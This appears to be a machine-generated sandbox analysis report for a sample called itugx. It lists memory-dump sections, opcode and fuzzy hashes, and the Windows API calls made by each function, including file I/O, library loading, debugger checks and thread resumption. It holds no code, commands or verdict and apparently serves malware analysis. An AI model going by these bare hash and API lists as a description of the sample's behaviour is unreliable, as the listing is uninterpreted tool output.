                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: CALL
                                                    • API String ID: 1385522511-4196123274
                                                    • Opcode ID: 00af9b5c0c623344001552f343896056cee262be16ec88254e29ffea9627708f
                                                    • Instruction ID: e49bf4cf97b44641c9972b664f6c9e74930fcb94dd30443cd3994d3e36a0b39b
                                                    • Opcode Fuzzy Hash: 00af9b5c0c623344001552f343896056cee262be16ec88254e29ffea9627708f
                                                    • Instruction Fuzzy Hash: 8922BA70608311AFC726DF14D880A2BBBF5BF89314F25895DF8968B3A1D731E941CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d86305fe11cefaa4d2162b301166ac75f5ba6b14a59c1f1d27ce7239fd3f1bc8
                                                    • Instruction ID: d458c419d8919fd9caae4bcfb3b558034719eec7f2172523aae6d96e0c86de91
                                                    • Opcode Fuzzy Hash: d86305fe11cefaa4d2162b301166ac75f5ba6b14a59c1f1d27ce7239fd3f1bc8
                                                    • Instruction Fuzzy Hash: 9E321030A00214DFCB26DFA4D892BAEB7B8FF15350F158558E856AF2A1D731ED84CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003133E9,003E2418,?,?,?,?,?,?,?,003132EF,?), ref: 00314227
                                                      • Part of subcall function 003184B7: _wcslen.LIBCMT ref: 003184CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: FullNamePath_wcslen
                                                    • String ID: $>
                                                    • API String ID: 4019309064-3568855185
                                                    • Opcode ID: 107b63824048360054959431a0a5e76366771afaacf1fab489dd76d5243103c0
                                                    • Instruction ID: 644f8561b423561fc073692855d709d8219a96cff83f184604a8dac6b85d915c
                                                    • Opcode Fuzzy Hash: 107b63824048360054959431a0a5e76366771afaacf1fab489dd76d5243103c0
                                                    • Instruction Fuzzy Hash: 4311AD756002199BCB5BEBA5D942EDE73ECAF0D350F000465B945EB2D1DEB4E7C88B21
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0031557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00315558,?,?,00354B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0031559E
                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00389665
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00389673
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfileStringWrite$FullNamePath
                                                    • String ID:
                                                    • API String ID: 3876400906-0
                                                    • Opcode ID: 42bafa664468affbfe73369fb127ff63603c7ac353cf86277a57e163828bdba3
                                                    • Instruction ID: 8016018c013543dc83e5777eb6af86153d9b6853cf953eac73ab6b8a48a77833
                                                    • Opcode Fuzzy Hash: 42bafa664468affbfe73369fb127ff63603c7ac353cf86277a57e163828bdba3
                                                    • Instruction Fuzzy Hash: 8E1107796006259FCB06EB64C840DAEB7B6FF48360B058884E856AB361DB30FD41CBD4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00313B33,?,00008000), ref: 00316E80
                                                    • CreateFileW.KERNELBASE(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00313B33,?,00008000), ref: 003559A2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: ca5621ee585755d40a132abaf9069de79c8a6489a16f75d5bda844e2a4c0809b
                                                    • Instruction ID: f91d9452cee3f99f579cae5068048bbd3aa34e0450ded4b50e31bce2eaefbefc
                                                    • Opcode Fuzzy Hash: ca5621ee585755d40a132abaf9069de79c8a6489a16f75d5bda844e2a4c0809b
                                                    • Instruction Fuzzy Hash: AF018031245221B6E3760A66CD0EF977F98EF06770F118310BE996A1E0C7B45894CBD0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • IsThemeActive.UXTHEME ref: 003132C4
                                                      • Part of subcall function 0031326D: SystemParametersInfoW.USER32 ref: 00313282
                                                      • Part of subcall function 0031326D: SystemParametersInfoW.USER32 ref: 00313299
                                                      • Part of subcall function 00313312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,003132EF,?), ref: 00313342
                                                      • Part of subcall function 00313312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,003132EF,?), ref: 00313355
                                                      • Part of subcall function 00313312: GetFullPathNameW.KERNEL32(00007FFF,?,?,003E2418,003E2400,?,?,?,?,?,?,003132EF,?), ref: 003133C1
                                                      • Part of subcall function 00313312: SetCurrentDirectoryW.KERNEL32(?,00000001,003E2418,?,?,?,?,?,?,?,003132EF,?), ref: 00313442
                                                    • SystemParametersInfoW.USER32 ref: 003132FE
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                    • String ID:
                                                    • API String ID: 1550534281-0
                                                    • Opcode ID: 61506c4c069c78c93964d4fd9da76d4e415363db923f6d3db212f89517966d96
                                                    • Instruction ID: 051a52587f439a803976832370116f0021d9f9f7eea38a4d45afe00be776e154
                                                    • Opcode Fuzzy Hash: 61506c4c069c78c93964d4fd9da76d4e415363db923f6d3db212f89517966d96
                                                    • Instruction Fuzzy Hash: A8F0B4795843849FE7276F60EC8ABA637ACA705305F004905F1198D5E2CBB944808F04
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • timeGetTime.WINMM ref: 0032F97A
                                                      • Part of subcall function 0031EE0A: GetInputState.USER32 ref: 0031EEB7
                                                    • Sleep.KERNEL32(00000000), ref: 0036FAC2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: InputSleepStateTimetime
                                                    • String ID:
                                                    • API String ID: 4149333218-0
                                                    • Opcode ID: fa535c56f752ce53031a62989d203c0eabd797b13f4ed54d40bac78fca6476a0
                                                    • Instruction ID: 2173de2a717aa505f9b1aee8204c79285a546db0a7c84fb28ec9a121663bb8b6
                                                    • Opcode Fuzzy Hash: fa535c56f752ce53031a62989d203c0eabd797b13f4ed54d40bac78fca6476a0
                                                    • Instruction Fuzzy Hash: 35F08C712406059FC359EF69D409B9ABBE9FF4A360F00402AE85ACB660DB70A880CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,0031AE65,?,?,?), ref: 00318793
                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,0031AE65,?,?,?), ref: 003187C9
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide
                                                    • String ID:
                                                    • API String ID: 626452242-0
                                                    • Opcode ID: b713cf4083248d280904d89592149b511f903cdc24b79cfa34bbde6de29530fd
                                                    • Instruction ID: 65884a3ff38a8abca3acd4d3358d3da5ae1b986d525837eea24035ee4575003f
                                                    • Opcode Fuzzy Hash: b713cf4083248d280904d89592149b511f903cdc24b79cfa34bbde6de29530fd
                                                    • Instruction Fuzzy Hash: 880184713011047FEB1E6B699D5BFBF7AADDF89750F14003EB506DA1D0ED609C409564
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9909b6f83f45376bd9b37c8935bcc6f8a08bffa24d33a3d9ca21320841c5c889
                                                    • Instruction ID: c40071ef6e380c53f1b5273c916ebefd09f11b0798dea489b61f9afe081f035f
                                                    • Opcode Fuzzy Hash: 9909b6f83f45376bd9b37c8935bcc6f8a08bffa24d33a3d9ca21320841c5c889
                                                    • Instruction Fuzzy Hash: A4F1AE70D102199BCF1EDF94C8919FEF7B9FF48300F55852AE852AB290EB349981CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4421b47f4f52745f84265ef9e162aeb682517cd1481ef13b012d284cbb66b2a9
                                                    • Instruction ID: bc33da82a7b7930c70cf245da7e30572710f7bf64c778655580dbeeda1bdfd81
                                                    • Opcode Fuzzy Hash: 4421b47f4f52745f84265ef9e162aeb682517cd1481ef13b012d284cbb66b2a9
                                                    • Instruction Fuzzy Hash: E651A779E00144EFDB12DF58C881E6A7BB5EB85364F5A8568F8089F392C771ED42CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 0037FBE3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower
                                                    • String ID:
                                                    • API String ID: 2358735015-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0031557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00315558,?,?,00354B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0031559E
                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 00388EBE
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: FullNamePathPrivateProfileString
                                                    • String ID:
                                                    • API String ID: 1991638491-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00316332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0031637F,?,?,003160AA,?,00000001,?,?,00000000), ref: 0031633E
                                                      • Part of subcall function 00316332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00316350
                                                      • Part of subcall function 00316332: FreeLibrary.KERNEL32(00000000,?,?,0031637F,?,?,003160AA,?,00000001,?,?,00000000), ref: 00316362
                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,003160AA,?,00000001,?,?,00000000), ref: 0031639F
                                                      • Part of subcall function 003162FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,003554C3,?,?,003160AA,?,00000001,?,?,00000000), ref: 00316304
                                                      • Part of subcall function 003162FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00316316
                                                      • Part of subcall function 003162FB: FreeLibrary.KERNEL32(00000000,?,?,003554C3,?,?,003160AA,?,00000001,?,?,00000000), ref: 00316329
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressFreeProc
                                                    • String ID:
                                                    • API String ID: 2632591731-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: __wsopen_s
                                                    • String ID:
                                                    • API String ID: 3347428461-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00316B73,?,00010000,00000000,00000000,00000000,00000000), ref: 0031B0AC
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00336A99,?,0000015D,?,?,?,?,003385D0,000000FF,00000000,?,?), ref: 00343BE2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock
                                                    • String ID:
                                                    • API String ID: 2638373210-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,003541AF,003D4600,00000002), ref: 0037D4E6
